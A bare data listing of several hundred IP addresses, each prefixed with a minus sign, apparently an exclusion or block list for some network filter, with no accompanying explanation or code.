-176.31.25.138 -178.32.138.240 -119.9.106.32 -122.70.150.216 -175.141.140.194 -45.61.113.57 -23.244.190.173 -119.10.55.202 -23.224.243.9 -112.74.54.75 -62.32.95.44 -120.24.242.181 -188.125.162.215 -77.68.36.77 -86.104.177.115 -183.63.55.245 -218.58.35.121 -166.63.21.109 -45.125.50.162 -202.10.78.46 -103.55.25.4 -119.29.116.253 -115.29.164.101 -94.23.170.51 -166.63.21.8 -142.91.95.217 -212.129.0.164 -45.76.147.66 -47.93.86.228 -23.244.190.174 -172.107.75.249 -211.23.25.103 -218.201.139.192 -108.61.212.219 -103.51.145.33 -23.252.168.55 -192.81.171.166 -193.54.33.150 -188.120.227.125 -23.224.115.39 -130.211.68.98 -221.5.44.28 -67.228.171.237 -112.74.200.83 -66.254.176.74 -23.104.176.47 -121.42.194.85 -82.135.151.220 -177.93.110.15 -37.187.101.34 -185.83.147.163 -185.102.184.25 -104.217.58.9 -119.29.217.196 -195.225.36.235 -221.232.104.236 -34.228.216.138 -47.94.87.232 -115.236.19.51 -46.30.46.139 -212.83.170.160 -95.172.255.12 -117.9.169.189 -221.229.162.125 -103.205.2.121 -116.249.199.57 -123.57.239.45 -176.111.49.39 -72.9.152.132 -120.27.222.20 -45.77.26.23 -108.170.59.207 -23.88.82.206 -23.230.19.58 -104.149.66.171 -39.108.116.140 -139.99.114.99 -121.42.143.15 -203.99.131.202 -172.106.186.26 -182.110.13.172 -1.119.129.189 -47.97.9.95 -185.29.122.102 -47.91.223.220 -23.224.115.152 -5.79.32.5 -89.38.230.24 -213.135.66.253 -104.203.139.159 -216.45.51.146 -115.146.121.218 -139.162.21.198 -173.236.107.54 -156.54.62.212 -198.24.128.27 -23.104.176.57 -142.91.95.218 -123.207.188.116 -23.88.82.159 -59.151.7.166 -119.59.67.31 -120.25.229.148 -47.96.19.242 -142.44.138.27 -107.6.221.117 -103.205.0.68 -183.157.46.30 -117.135.167.26 -185.136.205.110 -223.72.254.136 -94.124.90.153 -104.224.205.101 -158.69.24.20 -211.233.72.107 -123.56.241.233 -45.35.99.176 -104.217.67.113 -142.4.103.91 -80.232.164.153 -107.6.117.151 -185.171.12.21 -187.32.137.86 -112.126.88.18 -52.91.222.98 -23.224.115.198 -103.205.255.33 -119.23.24.65 -45.79.107.224 -200.199.229.75 -185.26.48.174 -58.215.39.183 -183.90.168.156 -167.114.131.189 -54.37.156.234 -103.205.2.124 -23.104.135.91 -103.49.10.158 -23.224.115.235 -103.231.14.99 -144.217.155.90 -87.98.143.95 -211.125.116.182 -64.31.31.156 -23.225.89.145 -59.56.182.79 -177.52.160.101 -52.41.168.90 -172.246.101.77 -69.13.210.198 -182.253.206.187 -66.254.184.131 -89.38.98.232 -121.42.175.177 -89.163.218.84 -136.0.69.19 -118.107.181.208 -39.108.8.178 -66.171.236.169 -89.221.65.119 -107.165.201.40 -182.92.172.2 -118.89.53.203 -23.224.243.6 -119.23.56.39 -103.205.3.86 -47.95.10.88 -158.69.36.5 -101.37.14.154 -91.121.78.183 -213.168.248.69 -115.68.89.53 -13.85.20.32 -64.140.157.219 -203.25.227.60 -109.120.164.4 -103.100.157.163 -162.211.86.91 -85.204.50.191 -114.55.7.221 -54.162.119.152 -43.244.187.91 -35.187.180.126 -139.199.11.165 -125.32.40.238 -182.253.221.43 -103.198.45.41 -185.174.31.234 -167.114.57.236 -217.196.20.211 -120.76.78.165 -104.168.171.232 -104.203.139.230 -103.68.82.113 -178.32.40.52 -120.76.74.202 -124.172.189.84 -172.107.165.26 -153.122.25.60 -149.210.143.130 -184.168.96.162 -103.44.18.70 -52.79.94.189 -136.0.69.120 -103.200.23.132 -101.132.117.93 -110.90.126.225 -39.106.186.2 -213.32.69.66 -69.13.210.175 -88.85.84.114 -185.48.175.10 -166.63.21.85 -210.245.21.158 -60.205.187.104 -120.55.114.221 -209.222.4.164 -142.4.107.234 -123.16.190.155 -103.230.121.140 -182.92.181.110 -101.201.105.109 -103.100.157.202 -218.58.74.167 -205.186.136.41 -47.93.42.52 -37.153.106.229 -45.35.99.158 -94.130.128.126 -115.159.62.47 -182.237.2.35 -194.145.209.122 -171.88.47.252 -172.246.101.58 -58.27.195.185 -18.194.17.120 -185.106.23.17 -42.48.107.177 -58.118.228.58 -120.31.133.221 -18.216.155.22 -18.216.155.22 -217.65.8.61 -46.97.20.211 -120.24.253.214 -107.164.66.249 -59.111.115.103 -5.89.74.26 -123.56.128.196 -45.252.248.237 -200.69.5.11 -123.56.13.29 -121.42.178.20 -113.240.233.48 -185.17.29.2 -184.154.126.29 -133.130.127.111 -103.205.1.123 -192.162.137.110 -203.88.210.28 -92.247.29.75 -185.38.164.139 -195.181.219.25 -123.206.85.201 -218.244.158.72 -190.14.60.114 -45.77.40.85 -139.162.235.48 -163.44.173.104 -31.220.55.70 -104.237.155.170 -211.103.198.54 -94.247.179.29 -115.159.198.144 -108.61.191.147 -198.24.163.246 -170.84.17.204 -121.43.57.233 -62.197.196.131 -47.52.89.201 -212.83.167.236 -101.201.78.107 -107.165.201.212 -104.232.102.152 -35.176.228.222 -157.7.53.97 -115.29.34.60 -86.104.177.60 -116.196.95.0 -219.234.1.59 -45.61.113.48 -185.147.80.47 -149.210.203.80 -23.224.245.18 -82.135.151.133 -85.17.147.133 -120.76.114.236 -109.168.78.29 -221.133.225.246 -107.190.232.75 -45.76.204.80 -115.29.176.49 -52.32.2.7 -195.248.235.117 -23.244.241.123 -180.175.155.19 -120.76.22.76 -113.108.127.235 -23.230.19.91 -172.107.146.161 -123.157.139.30 -213.136.92.103 -114.55.31.0 -37.46.85.149 -116.196.107.83 -142.91.95.237 -65.60.5.78 -219.246.69.200 -23.104.176.14 -72.9.152.131 -192.99.78.27 -59.95.117.250 -144.168.70.138 -194.58.118.21 -142.4.107.247 -46.32.252.203 -114.215.97.103 -108.163.140.82 -163.177.25.30 -197.249.0.225 -120.78.211.193 -23.104.180.15 -61.154.102.147 -37.59.213.73 -54.161.163.150 -61.131.49.6 -23.244.190.96 -43.251.178.50 -124.198.127.16 -183.60.23.218 -179.185.77.126 -222.216.1.66 -177.69.103.170 -121.40.23.7 -139.99.100.140 -23.224.245.22 -47.52.110.249 -66.39.96.82 -182.92.107.103 -120.76.72.25 -23.238.129.76 -107.165.201.81 -5.9.12.43 -173.244.217.86 -23.238.129.78 -46.252.193.132 -91.223.142.19 -23.238.176.199 -120.78.179.223 -223.197.92.77 -142.91.95.253 -173.236.115.48 -162.242.237.101 -108.61.151.36 -182.92.172.205 -139.196.192.120 -47.96.133.156 -23.104.135.166 -123.56.160.244 -12.37.159.99 -202.43.39.97 -109.254.248.71 -45.41.92.172 -103.53.199.220 -78.111.82.109 -41.206.193.90 -104.167.11.44 -104.217.62.53 -182.156.78.101 -172.107.71.53 -37.187.167.210 -180.178.62.84 -185.66.141.229 -54.163.32.230 -161.202.23.105 -119.29.232.38 -74.221.216.81 -166.63.21.95 -202.153.178.197 -23.224.244.53 -83.98.176.209 -172.106.186.35 -59.63.166.112 -52.80.85.201 -151.80.170.105 -91.121.222.191 -112.74.35.23 -188.93.234.236 -210.209.87.189 -84.39.38.5 -103.100.157.117 -88.99.114.211 -119.42.149.132 -61.147.98.205 -23.88.82.43 -31.214.144.106 -121.43.197.203 -103.12.51.33 -92.87.106.12 -45.114.94.79 -119.42.149.22 -203.246.112.209 -120.25.67.34 -198.12.158.169 -209.58.180.103 -64.110.130.235 -113.10.190.132 -122.114.55.128 -47.92.121.100 -116.66.238.65 -207.244.75.170 -23.104.187.41 -118.174.41.5 -197.248.126.186 -50.22.159.130 -115.29.197.78 -67.225.172.104 -212.83.165.187 -218.244.147.234 -220.189.245.170 -130.117.121.160 -51.254.140.57 -36.152.27.198 -94.199.17.120 -221.207.8.92 -18.195.202.232 -23.104.135.145 -104.217.67.89 -203.195.184.216 -119.254.97.243 -149.56.117.219 -157.7.134.90 -212.24.99.23 -23.238.145.96 -114.215.239.10 -78.111.105.219 -185.163.100.136 -89.33.247.135 -107.167.183.17 -103.74.118.65 -103.75.101.41 -81.180.117.186 -54.254.250.109 -59.50.33.146 -14.238.2.35 -120.77.40.149 -202.40.176.18 -212.146.84.221 -23.238.176.248 -104.203.82.27 -37.59.213.88 -103.37.161.166 -23.244.241.244 -202.6.17.162 -179.43.152.37 -120.55.40.77 -104.203.139.30 -149.56.184.142 -37.123.99.71 -23.238.176.238 -23.238.176.217 -37.59.214.50 -114.67.62.14 -54.213.31.87 -212.129.32.223 -112.54.81.60 -58.49.160.62 -188.93.18.213 -120.27.196.12 -92.222.6.1 -192.250.225.56 -123.57.37.129 -82.135.151.122 -34.194.21.168 -47.94.193.208 -114.55.84.254 -81.17.27.174 -2001:8d8:88a:4700::2:9f57 -131.161.46.2 -218.108.53.121 -74.206.184.232 -94.23.55.110 -104.203.82.31 -125.253.127.180 -178.33.233.161 -188.241.113.213 -45.79.93.175 -81.21.199.220 -23.238.176.210 -120.76.159.9 -112.13.90.10 -103.42.178.124 -185.171.24.79 -47.94.128.107 -185.66.140.155 -195.202.91.76 -103.75.46.84 -31.3.173.86 -185.136.205.112 -183.230.147.138 -182.16.57.93 -118.69.54.70 -103.43.12.29 -136.0.69.239 -103.100.157.9 -139.162.37.79 -142.44.201.210 -61.164.79.204 -39.108.60.23 -47.92.139.3 -103.77.169.141 -18.231.109.144 -23.225.239.107 -172.110.22.143 -200.69.137.164 -13.228.220.93 -103.83.178.166 -104.203.82.80 -45.32.100.24 -185.163.100.165 -116.196.94.100 -23.225.89.251 -72.55.139.46 -45.40.139.203 -172.107.64.48 -223.111.182.4 -54.154.50.215 -178.79.131.200 -122.144.133.45 -45.114.94.26 -38.96.185.21 -120.24.240.212 -112.74.99.187 -104.217.62.13 -2001:470:d28a::71 -96.239.108.154 -99.198.111.115 -23.238.145.83 -103.205.0.69 -123.206.254.194 -103.235.246.192 -42.123.65.213 -120.31.132.181 -52.192.57.165 -92.51.164.87 -120.77.168.126 -83.167.242.171 -103.12.50.24 -45.61.115.23 -172.107.75.206 -37.59.218.81 -172.107.75.236 -123.56.122.182 -193.222.54.10 -23.104.180.30 -80.85.33.13 -120.24.46.122 -198.24.128.11 -52.52.244.8 -203.123.51.229 -50.115.161.198 -64.118.95.203 -144.217.12.175 -54.172.178.30 -119.81.106.226 -167.114.122.54 -185.174.29.232 -222.255.237.151 -46.105.48.73 -120.76.65.2 -112.74.198.197 -116.62.17.245 -121.43.235.108 -211.99.191.218 -172.107.73.254 -123.57.9.243 -23.104.176.20 -185.72.244.169 -149.56.25.115 -104.223.109.245 -112.121.175.78 -173.233.93.198 -121.173.56.223 -195.35.128.78 -185.163.100.89 -23.88.82.47 -123.123.81.185 -47.90.40.252 -182.92.242.124 -60.251.71.115 -183.15.12.8 -198.12.152.93 -125.253.127.184 -138.201.60.158 -81.23.100.13 -103.96.140.15 -104.217.67.101 -113.196.233.248 -64.34.70.63 -217.20.131.116 -89.185.234.35 -103.230.121.168 -43.224.35.14 -74.207.242.73 -103.205.0.84 -162.214.1.142 -115.182.54.14 -180.214.163.161 -47.92.36.144 -184.154.163.84 -47.88.194.48 -23.234.7.164 -103.53.199.132 -104.200.150.198 -192.99.150.181 -103.231.66.27 -103.74.116.114 -146.71.97.61 -116.62.222.8 -182.92.78.142 -2a01:7e00::f03c:91ff:fe84:bcfa -177.234.158.82 -106.2.12.80 -185.136.205.111 -114.215.210.108 -60.10.135.159 -45.32.112.26 -139.199.154.169 -188.116.12.235 -120.55.161.217 -103.44.160.227 -212.150.250.158 -45.33.12.9 -114.215.206.41 -106.0.5.121 -119.147.115.61 -43.249.9.46 -148.72.150.55 -123.57.235.192 -104.237.133.114 -45.33.116.170 -49.212.174.115 -94.23.156.148 -178.216.201.154 -104.250.135.14 -142.91.95.11 -120.77.204.251 -46.105.225.242 -188.116.12.19 -23.235.234.101 -115.28.159.160 -103.205.0.108 -185.163.100.54 -95.211.183.148 -89.19.6.167 -160.119.152.12 -133.242.201.37 -178.238.234.166 -139.162.25.219 -83.223.125.165 -115.29.191.36 -150.129.83.35 -172.107.75.198 -211.159.180.229 -63.142.255.193 -124.232.163.134 -116.62.66.38 -176.31.255.17 -81.180.86.27 -45.35.102.173 -173.231.157.243 -103.205.3.102 -173.192.32.151 -103.204.13.43 -42.62.84.45 -202.85.221.77 -54.255.146.242 -47.93.236.123 -174.142.54.8 -185.163.100.97 -221.193.253.35 -23.244.190.133 -103.100.157.35 -198.27.75.222 -45.76.148.126 -5.9.224.70 -184.154.164.226 -172.107.73.211 -45.114.94.136 -137.74.202.129 -121.40.220.131 -194.186.48.20 -149.210.157.148 -213.32.55.36 -66.175.223.4 -91.134.177.225 -198.7.57.177 -45.252.249.194 -192.99.249.74 -5.135.58.96 -120.24.224.206 -45.77.40.232 -137.117.69.178 -185.8.165.137 -103.12.49.26 -118.184.45.112 -172.107.64.54 -118.112.190.150 -192.99.0.132 -47.93.42.6 -184.107.210.37 -67.229.72.116 -173.230.251.181 -114.80.0.9 -78.140.152.151 -173.199.117.55 -210.27.146.183 -172.104.40.16 -139.162.23.48 -188.132.147.29 -121.199.50.107 -47.92.39.28 -104.203.82.172 -174.139.69.138 -185.174.30.163 -120.24.78.94 -198.50.199.240 -66.220.11.157 -45.252.250.173 -104.224.200.244 -198.2.212.185 -23.225.239.26 -120.77.148.219 -47.88.193.149 -5.39.61.172 -23.23.226.29 -52.10.10.30 -182.92.161.204 -45.61.114.42 -103.53.198.181 -49.212.169.23 -106.184.4.102 -45.35.102.157 -45.61.112.3 -91.240.86.2 -182.253.203.134 -114.215.150.23 -43.248.226.161 -94.99.150.36 -104.217.54.21 -192.163.214.210 -61.191.55.159 -209.239.123.174 -54.227.245.213 -116.62.24.24 -172.107.64.16 -149.202.57.236 -45.35.99.179 -185.163.100.21 -78.129.239.208 -142.44.242.14 -23.19.238.12 -87.98.138.158 -213.169.64.62 -120.76.97.155 -142.4.103.120 -23.224.243.53 -45.35.99.148 -185.48.238.46 -117.121.204.70 -52.206.112.104 -5.149.249.200 -218.77.100.118 -103.100.157.68 -172.107.165.28 -91.223.205.251 -142.44.201.216 -103.100.157.10 -162.13.137.96 -172.106.187.206 -23.225.89.84 -59.110.63.23 -101.251.243.203 -123.207.247.102 -107.22.236.10 -91.120.235.154 -185.141.165.126 -101.201.76.47 -144.217.96.135 -193.150.169.12 -118.178.229.19 -119.29.190.69 -195.144.200.61 -103.28.37.239 -149.202.13.98 -185.124.87.29 -60.205.223.239 -112.121.100.245 -103.100.157.220 -195.178.5.163 -114.108.177.213 -61.190.52.27 -183.6.111.2 -45.35.99.182 -62.75.148.184 -169.48.200.184 -45.41.92.161 -167.114.174.64 -115.126.53.161 -111.68.45.155 -115.146.123.215 -23.244.241.37 -38.83.102.150 -190.202.87.156 -213.219.38.26 -183.56.132.161 -103.202.136.87 -64.120.123.217 -118.182.18.160 -111.93.33.226 -169.55.233.197 -204.11.236.212 -75.126.75.172 -45.61.113.37 -198.24.161.140 -163.172.124.155 -37.220.0.98 -45.56.89.216 -23.224.115.116 -116.55.248.234 -23.110.61.66 -93.180.6.3 -172.104.234.219 -45.35.102.162 -51.254.100.51 -45.61.112.5 -23.225.239.131 -50.97.150.59 -108.61.9.68 -172.104.237.199 -123.196.120.145 -119.148.4.53 -162.13.184.228 -45.59.69.180 -137.74.9.131 -42.62.2.75 -94.23.28.160 -47.91.41.234 -172.246.101.18 -45.42.94.180 -104.203.139.22 -50.206.28.137 -5.160.219.60 -103.100.157.53 -188.132.215.230 -121.41.62.18 -120.24.247.218 -23.104.135.202 -112.194.4.245 -142.91.239.100 -209.188.18.23 -45.32.162.202 -192.99.147.222 -182.92.194.56 -115.29.108.229 -107.187.41.37 -49.212.159.36 -188.165.10.144 -104.203.139.70 -82.221.139.58 -23.244.190.188 -217.136.253.167 -172.246.101.83 -221.122.93.158 -23.104.180.4 -79.143.189.82 -118.193.240.234 -103.247.8.110 -120.77.39.241 -60.205.224.122 -212.32.237.186 -91.238.192.106 -45.33.49.217 -192.36.249.126 -222.186.30.53 -108.161.139.91 -174.139.52.168 -166.78.172.79 -47.52.33.63 -125.212.252.142 -104.217.62.25 -103.193.172.26 -150.140.170.22 -112.91.18.101 -5.196.108.134 -88.150.157.168 -82.135.148.112 -23.238.129.101 -111.204.144.170 -54.38.37.190 -86.104.177.47 -223.25.101.187 -207.244.91.134 -198.24.161.135 -125.46.58.60 -69.16.214.138 -66.220.11.148 -23.238.145.71 -188.116.53.124 -174.139.37.124 -192.161.49.94 -103.36.35.195 -123.56.232.247 -74.84.197.201 -82.135.148.111 -218.26.171.21 -66.39.140.141 -182.16.1.220 -185.124.84.173 -117.18.12.36 -82.223.134.126 -23.224.115.73 -23.88.58.104 -163.44.206.58 -47.96.43.205 -82.135.151.176 -37.59.219.154 -120.26.120.119 -121.42.41.231 -101.200.126.134 -23.238.145.117 -158.69.181.154 -37.59.9.28 -45.4.78.10 -176.31.210.44 -178.32.28.162 -1.32.218.2 -103.42.180.4 -45.114.94.103 -183.62.237.36 -1.196.216.220 -120.77.9.134 -162.247.76.169 -104.217.67.83 -120.24.90.241 -23.244.241.208 -82.102.14.9 -23.235.244.198 -5.135.221.133 -144.168.123.4 -210.5.46.74 -192.237.213.179 -52.10.225.94 -23.92.65.150 -114.55.54.9 -142.4.107.120 -65.19.143.210 -23.252.161.203 -123.31.17.56 -157.7.143.50 -107.164.66.204 -139.162.197.248 -125.253.127.243 -47.88.102.159 -37.221.171.22 -125.253.127.254 -128.101.122.221 -200.27.110.212 -202.45.190.13 -186.249.1.147 -64.207.179.55 -103.215.8.37 -72.52.138.2 -60.190.33.107 -23.224.243.11 -125.253.127.167 -118.89.111.29 -107.187.41.249 -185.177.44.45 -202.152.183.92 -184.168.135.53 -39.106.251.177 -103.245.181.246 -157.7.136.68 -37.159.197.242 -89.219.34.213 -173.164.61.245 -141.209.175.232 -142.4.107.68 -193.254.187.136 -218.244.141.202 -198.200.41.93 -209.151.248.237 -139.162.74.16 -5.39.85.82 -111.230.241.150 -146.148.83.144 -222.255.175.82 -128.101.122.229 -120.76.44.177 -123.31.40.41 -184.168.92.79 -176.31.133.67 -47.90.57.189 -72.1.245.20 -23.238.129.123 -58.82.167.50 -61.145.126.53 -123.57.173.120 -216.131.81.121 -5.135.224.49 -101.251.223.199 -37.187.159.120 -142.4.119.121 -114.55.4.44 -69.169.88.86 -65.60.59.124 -198.50.176.66 -163.172.141.170 -162.247.233.40 -14.0.85.8 -50.31.156.61 -216.131.90.234 -120.78.12.23 -103.215.49.205 -133.242.21.156 -103.100.157.147 -119.23.153.36 -111.91.236.53 -123.56.76.16 -208.92.165.62 -123.31.17.88 -50.31.156.60 -211.99.249.68 -152.1.32.213 -46.105.172.250 -123.57.139.168 -112.78.10.108 -222.255.236.50 -87.229.59.203 -172.104.143.230 -131.108.101.245 -121.41.101.253 -123.30.237.48 -142.91.232.102 -45.79.158.171 -188.165.203.143 -185.163.100.35 -49.212.192.222 -23.244.190.228 -216.238.176.41 -176.31.200.119 -47.104.70.101 -61.182.69.46 -119.148.41.187 -203.162.235.57 -119.28.19.252 -199.89.1.7 -23.227.132.11 -140.211.15.173 -62.213.100.126 -146.71.123.69 -118.193.239.59 -64.131.72.174 -50.57.58.23 -213.202.230.160 -125.253.127.176 -218.15.113.140 -101.201.28.193 -187.84.144.191 -125.253.127.170 -121.40.63.142 -23.110.61.81 -125.253.127.250 -96.30.47.162 -185.174.30.200 -188.116.4.185 -91.196.185.3 -123.207.54.167 -120.78.27.66 -199.119.237.3 -122.228.169.182 -123.207.253.124 -125.253.125.6 -219.90.67.75 -118.89.26.109 -23.104.135.190 -91.134.187.126 -125.253.127.148 -125.253.127.192 -172.107.147.25 -123.31.30.144 -182.243.228.236 -125.253.127.178 -103.68.251.10 -164.132.182.104 -199.19.227.204 -186.248.164.66 -192.99.93.188 -185.4.30.215 -195.162.24.107 -103.230.121.157 -223.165.5.166 -146.71.123.67 -23.225.239.212 -47.92.95.201 -107.164.66.120 -65.60.59.126 -192.99.78.18 -122.114.45.200 -23.238.166.159 -162.13.167.27 -121.41.110.189 -114.55.72.106 -119.23.221.193 -122.114.42.180 -46.105.158.53 -23.224.115.117 -115.29.140.48 -116.62.65.207 -114.142.159.238 -54.38.156.50 -172.110.7.216 -23.238.176.207 -77.77.151.93 -142.4.107.100 -185.163.100.240 -172.107.64.49 -195.35.128.100 -94.103.150.49 -23.19.237.50 -23.19.237.50 -142.91.95.36 -182.254.151.156 -101.200.190.197 -159.93.225.210 -37.117.139.87 -160.16.82.207 -103.81.84.61 -115.28.68.162 -103.15.67.85 -104.224.205.104 -198.20.126.73 -182.18.163.140 -47.89.208.14 -117.120.7.105 -23.19.238.33 -111.160.20.251 -178.32.201.90 -193.104.170.56 -121.40.174.103 -212.68.42.240 -104.193.10.216 -103.45.99.148 -187.19.197.10 -199.244.112.2 -106.14.165.156 -149.56.25.38 -178.33.255.95 -211.148.28.39 -60.10.1.205 -104.207.50.108 -59.110.16.81 -121.40.44.49 -188.116.53.133 -77.234.221.46 -172.106.187.209 -45.77.164.117 -23.238.145.124 -106.14.41.118 -198.23.65.84 -198.200.41.46 -45.33.101.111 -185.174.29.233 -185.163.100.91 -82.135.151.170 -115.42.217.248 -173.243.113.158 -45.32.237.220 -47.88.149.111 -120.55.181.115 -158.85.51.172 -91.121.3.90 -107.190.233.69 -172.107.71.47 -46.105.117.139 -23.244.190.134 -139.199.165.229 -106.14.33.203 -106.15.56.82 -211.233.62.28 -59.49.137.224 -201.20.82.189 -121.199.15.34 -173.193.44.35 -83.167.242.172 -112.121.163.35 -111.93.124.131 -125.88.146.12 -103.12.51.59 -59.110.16.139 -107.180.79.241 -211.103.116.5 -31.171.244.73 -121.42.246.9 -198.24.162.142 -120.55.170.230 -62.109.25.26 -185.87.193.101 -176.31.116.182 -94.23.233.84 -175.12.17.118 -66.70.223.65 -52.196.49.117 -142.91.95.103 -23.224.242.37 -202.237.149.125 -133.242.13.29 -107.164.229.117 -134.213.30.27 -213.219.37.39 -34.205.78.200 -5.196.44.172 -54.88.126.167 -85.140.40.163 -173.214.179.28 -125.253.127.119 -174.139.69.131 -112.124.45.170 -218.32.216.235 -142.4.107.113 -118.184.0.39 -45.79.98.191 -67.229.63.90 -142.91.239.75 -45.64.170.13 -23.104.187.21 -199.168.189.12 -121.42.162.12 -139.129.236.164 -23.244.190.135 -115.29.189.43 -198.200.41.58 -47.52.25.195 -23.230.19.179 -201.144.45.243 -103.100.157.106 -204.11.236.211 -185.163.100.65 -58.221.66.58 -60.213.2.210 -183.155.87.226 -103.100.157.146 -106.15.88.140 -52.5.81.255 -188.132.205.5 -118.190.50.12 -144.217.102.115 -23.244.190.187 -5.196.12.104 -94.23.80.9 -111.68.14.242 -174.139.69.134 -174.37.242.33 -47.75.15.65 -103.198.45.10 -200.61.221.229 -52.200.135.164 -91.237.108.44 -113.10.177.14 -114.215.114.38 -82.135.151.237 -124.88.165.232 -220.121.116.226 -60.205.201.148 -172.106.184.50 -212.1.72.45 -35.194.134.222 -103.205.2.85 -144.48.223.123 -45.114.94.196 -37.48.73.160 -223.27.158.36 -45.114.94.222 -104.203.139.2 -119.10.56.127 -51.15.136.158 -68.235.62.219 -23.104.180.24 -50.62.57.231 -136.0.69.242 -45.35.99.154 -47.90.85.102 -172.106.184.23 -107.187.41.211 -182.92.239.78 -92.48.78.54 -217.12.252.2 -133.242.12.25 -121.199.39.125 -142.4.103.106 -176.58.113.226 -120.24.215.90 -120.27.156.76 -190.214.47.134 -64.120.123.248 -188.132.250.90 -193.70.97.222 -196.15.196.89 -180.178.44.35 -61.155.41.114 -172.107.165.30 -223.165.5.3 -23.235.234.15 -67.229.63.91 -103.105.52.249 -199.83.212.213 -54.241.25.193 -123.57.50.19 -37.59.4.223 -123.57.56.95 -144.217.53.65 -27.17.49.146 -23.19.202.53 -104.217.67.99 -198.50.225.134 -23.19.237.48 -103.27.239.10 -83.223.141.153 -47.90.4.85 -45.252.248.117 -173.236.115.189 -103.205.1.105 -23.19.202.20 -185.20.225.247 -198.24.161.132 -52.56.104.127 -172.104.15.134 -45.77.43.79 -185.81.167.66 -54.223.123.73 -37.187.208.12 -45.32.125.171 -210.140.41.111 -66.96.252.114 -62.111.176.227 -142.4.103.87 -66.171.236.195 -65.18.120.26 -110.16.81.106 -198.24.163.254 -121.40.31.170 -180.178.33.107 -198.58.118.12 -185.185.40.62 -116.62.152.94 -157.7.244.219 -45.114.94.188 -185.62.75.235 -139.129.116.62 -96.44.140.60 -119.29.171.173 -193.104.170.125 -23.88.82.156 -172.106.187.213 -118.190.26.124 -212.68.42.96 -103.205.3.116 -103.213.251.70 -211.149.226.75 -23.104.177.37 -185.163.100.230 -45.42.94.131 -203.123.51.206 -185.26.48.165 -104.217.62.28 -185.174.28.15 -185.163.100.207 -142.91.232.111 -142.91.95.31 -116.255.159.145 -188.132.147.56 -49.212.140.240 -172.106.187.196 -178.219.176.2 -5.196.177.81 -104.203.82.231 -104.193.68.217 -27.194.88.210 -203.123.51.177 -111.202.120.112 -45.32.108.229 -163.172.164.190 -188.165.156.89 -70.36.125.46 -23.104.176.39 -91.224.135.106 -184.107.158.92 -202.102.95.144 -47.93.247.242 -121.40.56.83 -27.118.26.174 -219.140.198.70 -134.119.219.184 -54.202.150.51 -180.250.177.250 -103.12.51.25 -54.187.59.147 -173.224.121.178 -219.234.139.7 -74.117.154.197 -52.26.200.148 -23.225.0.231 -151.80.246.100 -23.224.115.160 -193.70.50.65 -103.100.157.208 -149.56.41.123 -82.135.148.234 -172.107.75.248 -125.212.250.109 -115.29.248.156 -42.120.21.164 -47.52.21.72 -45.76.148.87 -54.215.13.38 -81.26.149.214 -109.73.168.233 -172.107.75.235 -172.106.186.15 -37.58.117.197 -185.200.44.6 -123.206.83.235 -119.29.5.59 -64.120.123.143 -42.51.42.146 -149.210.143.126 -54.248.99.120 -120.78.158.86 -104.218.120.223 -139.196.253.68 -64.118.90.212 -122.114.28.5 -120.192.59.124 -120.25.72.133 -107.21.129.108 -157.7.243.233 -121.196.198.250 -121.41.229.128 -207.99.46.152 -104.217.62.32 -118.184.18.104 -91.205.160.11 -222.241.7.200 -60.29.208.33 -123.207.84.228 -216.250.125.71 -120.78.230.26 -198.24.128.7 -46.30.47.34 -23.19.22.55 -103.205.0.111 -211.149.165.37 -79.143.179.121 -123.207.243.147 -104.203.82.24 -203.123.51.176 -185.22.234.22 -114.113.225.250 -5.135.58.105 -115.28.147.46 -120.25.152.227 -111.231.16.72 -78.109.170.128 -125.212.252.126 -72.1.245.19 -140.117.11.34 -64.120.123.228 -202.6.17.139 -112.78.10.123 -78.158.30.115 -185.22.186.73 -123.57.233.237 -193.104.170.246 -114.55.227.140 -95.213.194.190 -149.202.192.40 -125.131.226.218 -190.187.120.253 -85.204.50.29 -137.74.90.64 -47.52.228.80 -123.206.208.188 -125.88.187.60 -142.91.241.124 -220.164.140.188 -121.43.187.220 -158.69.131.219 -52.90.68.245 -198.50.176.71 -139.196.43.116 -198.44.165.11 -23.91.23.171 -185.182.99.31 -45.32.34.165 -5.63.155.220 -167.114.64.110 -180.153.245.114 -115.248.153.67 -123.56.112.104 -180.175.30.86 -185.61.137.171 -91.240.84.83 -61.216.146.171 -115.192.78.113 -117.28.254.50 -139.129.131.176 -104.207.52.77 -120.24.237.55 -45.41.92.144 -45.114.94.115 -106.14.61.219 -107.180.79.48 -173.0.63.212 -37.59.213.83 -187.108.216.13 -103.100.157.249 -172.246.101.112 -39.108.114.42 -104.197.126.171 -142.44.162.41 -209.172.50.196 -172.246.101.144 -89.185.229.198 -69.64.80.174 -5.44.217.8 -5.189.168.58 -185.92.223.49 -218.76.252.126 -167.114.64.118 -133.242.154.222 -103.12.49.7 -112.74.78.110 -122.114.45.206 -77.91.232.210 -104.203.139.242 -119.252.89.19 -66.212.31.68 -116.196.113.221 -139.224.234.4 -198.24.160.92 -106.14.43.103 -125.71.150.247 -199.193.6.246 -54.37.216.236 -112.124.4.130 -101.50.2.13 -45.79.184.151 -120.26.49.250 -118.178.139.192 -120.77.41.46 -119.29.53.177 -101.69.110.87 -101.201.209.7 -37.97.249.13 -185.164.30.18 -69.36.242.133 -104.207.40.145 -107.151.159.199 -52.74.9.53 -58.60.152.168 -49.212.142.251 -79.137.65.68 -202.169.180.128 -176.223.197.52 -47.97.213.108 -123.207.243.236 -173.236.41.139 -94.23.75.4 -46.165.48.32 -45.79.186.94 -103.205.3.94 -106.42.61.170 -118.190.71.83 -110.4.82.176 -104.155.220.97 -112.74.48.13 -59.7.18.195 -125.212.243.216 -208.96.162.248 -172.246.101.236 -112.84.184.114 -111.201.81.122 -198.200.41.7 -45.61.115.51 -142.91.95.20 -23.225.89.82 -103.45.28.184 -123.57.146.63 -182.254.164.90 -23.104.180.39 -46.166.163.20 -142.91.232.91 -101.95.155.206 -108.170.59.199 -185.5.251.144 -54.183.87.246 -45.76.220.161 -115.28.171.160 -88.80.181.57 -23.244.190.214 -123.57.44.159 -104.217.58.54 -60.12.76.84 -121.40.223.76 -116.255.229.215 -198.2.212.187 -107.6.174.134 -115.231.219.136 -198.12.150.20 -54.90.82.68 -103.235.222.214 -91.121.92.22 -159.253.45.29 -62.112.195.61 -23.224.242.60 -142.91.241.74 -62.109.19.121 -103.234.143.151 -183.237.163.88 -121.40.41.196 -120.76.156.40 -111.90.173.101 -216.104.35.78 -120.27.144.143 -113.196.233.169 -82.102.14.20 -114.55.24.89 -106.14.139.135 -182.131.21.117 -121.43.186.228 -106.15.224.47 -87.120.42.32 -121.40.208.193 -158.69.72.19 -120.55.189.202 -46.245.167.38 -123.71.212.212 -180.240.177.228 -95.183.11.89 -39.108.221.55 -185.174.30.210 -194.28.167.129 